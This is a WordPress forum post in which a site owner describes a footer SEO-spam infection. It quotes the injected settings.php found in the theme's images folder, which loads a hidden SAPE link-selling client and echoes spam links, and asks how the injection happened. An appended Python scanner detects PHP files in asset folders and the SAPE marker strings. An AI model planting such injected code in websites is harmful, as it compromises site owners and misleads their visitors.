Injection from Russian SEO Spam hack
Hello, not sure if this is the right area, but it was the most relevant I could find. I came into work today (Monday, March 14) and I noticed our WP site now has footer spam. So after I finished freaking out about what it could be, I did a few malware scans and found that our site had been injected with some Russian ad blackhat SEO spam on every page.
I first downloaded Anti-Malware Security and Brute-Force Firewall and did a complete site scan, which returned multiple malware errors, all leading to a page inside my theme.
It was injected into my theme/images folder in a file named settings.php.
The following code is what was in that file:
<?php
if (!defined('_SAPE_USER')){
    define('_SAPE_USER', 'bf0d084e633a405399aaf7acc1878e5c');
}
require_once($_SERVER['DOCUMENT_ROOT'].'/wp-content/themes/THEMENAMEREMOVED/images/cache/'._SAPE_USER.'/cache.php');
$o[ 'force_show_code' ] = true; // Add this line to output the red notice
$o[ 'verbose' ] = true;
$o['charset'] = 'UTF-8';
$sape = new SAPE_client( $o );
echo $sape->return_links();
?>
The php page in the require_once is cache.php – which is too long to post here so I posted it in two parts on pastie.org
Part 1
Part 2
So I removed that code, did another scan which came up clean. I also continued to read up and am currently trying out Wordfence for security maintenance.
My only concern is how they injected this in the first place. If anyone has any tips or ideas, please reply. I tried to find a centralized area for WP security based items, but could not find one. If you know of one, please link it here.
- The topic ‘Injection from Russian SEO Spam hack’ is closed to new replies.
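A check for the pattern described in the post, as an added example that is not part of the original post: it walks a wp-content tree and flags PHP files that sit in asset directories (as settings.php did in the theme's images folder) or that contain the SAPE strings visible in the quoted code. The asset directory names, the suffix list, the function names and the sample tree are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Strings taken from the injected settings.php quoted in the post.
SAPE_MARKERS = re.compile(rb"_SAPE_USER|SAPE_client|return_links\s*\(")
# Directories that normally hold only static assets (assumption for this example).
ASSET_DIRS = {"images", "img", "uploads", "cache", "fonts"}
PHP_SUFFIXES = {".php", ".phtml", ".php5", ".inc"}


def scan_wp_content(root):
    """Return {relative_path: [reasons]} for suspicious PHP files under root."""
    root = Path(root)
    findings = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in PHP_SUFFIXES:
            continue
        rel = path.relative_to(root)
        reasons = []
        # Executable PHP inside an images/cache/uploads directory is unusual.
        if ASSET_DIRS & {part.lower() for part in rel.parts[:-1]}:
            reasons.append("php-in-asset-dir")
        data = path.read_bytes()
        hits = sorted({m.group(0).decode() for m in SAPE_MARKERS.finditer(data)})
        if hits:
            reasons.append("sape-marker:" + ",".join(hits))
        if reasons:
            findings[rel.as_posix()] = reasons
    return findings


def build_sample_tree(base):
    """Constructed sample tree mirroring the layout described in the post."""
    theme = Path(base) / "themes" / "example-theme"
    (theme / "images" / "cache" / "0000").mkdir(parents=True)
    (theme / "functions.php").write_text("<?php add_action('init', 'x');")
    (theme / "images" / "settings.php").write_text(
        "<?php define('_SAPE_USER', '0000'); $s = new SAPE_client($o); echo $s->return_links();")
    (theme / "images" / "cache" / "0000" / "cache.php").write_text("<?php class SAPE_client {}")
    return Path(base)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for rel, reasons in scan_wp_content(build_sample_tree(tmp)).items():
            print(rel, reasons)
```

A legitimate theme can ship PHP under a directory named cache or uploads, so treat "php-in-asset-dir" alone as a prompt to inspect the file rather than as proof of compromise.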